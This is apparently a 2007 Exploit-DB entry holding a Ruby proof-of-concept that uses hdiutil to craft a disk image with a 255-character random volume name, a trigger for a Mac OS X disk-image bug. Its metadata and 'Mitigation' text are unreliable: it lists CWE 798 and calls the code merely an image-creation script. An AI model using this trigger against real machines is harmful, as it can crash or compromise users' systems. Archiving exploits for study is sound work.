vendor:
by: LMH
CVSS: 3.3 (LOW)
Arbitrary Volume Name
CWE: 798
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Creating a Disk Image with Arbitrary Volume Name

The script creates a disk image with an arbitrary volume name. It calls the 'hdiutil' command-line tool to create the disk image with the specified size, file system, and volume name. The volume name is 255 characters long and is generated randomly from ASCII digits and letters (0-9, A-Z, a-z). The script then reads the created disk image back and prints information about it, including the length of the volume name as stored in the image at offset 0x9c10 and the size of the disk image in bytes.

Mitigation:

There is no specific mitigation for this vulnerability as it is a script for creating disk images. However, users should be cautious when running scripts from untrusted sources and ensure that they understand the functionality and potential risks before executing them.

Exploit-DB raw data:

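#!/usr/bin/ruby
# (c) 2006 LMH <lmh [at] infopull.com>.
#

require 'fileutils'
require 'zlib'

# Path to hdiutil, plus defaults for the image name, size and file system.
# Each default can be overridden with a command-line argument.
hdiutil = "/usr/bin/hdiutil"
dmgname = (ARGV[0] || "MOAB-09-01-2007.dmg")
dmgsize = (ARGV[1] || "200k")
filesys = (ARGV[2] || "UFS")
volname = ""

# Build a 255-character volume name from random characters in 0-9, A-Z, a-z.
255.times do
  volname << (i = Kernel.rand(62); i += ((i < 10) ? 48 : ((i < 36) ? 55 : 61 ))).chr
end

# Remove any previous image, then create a new one with the generated volume name.
FileUtils.rm_f(dmgname)
system "#{hdiutil} create #{dmgname} -size #{dmgsize} -fs #{filesys} -volname #{volname}"

# Read the image back as raw bytes (binread keeps the offsets byte-based).
puts "++ reading #{dmgname}..."
dmg_stream = File.binread(dmgname)
# unpack("C2") returns the first two bytes at offset 0x9c10 as unsigned integers.
dmg_vnsize = dmg_stream[0x9c10,0x9c14].unpack("C2")
puts "++ volname length at dmg: #{dmg_vnsize}"
puts "++ dmg size: #{dmg_stream.size} bytes."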

# milw0rm.com [2007-01-09]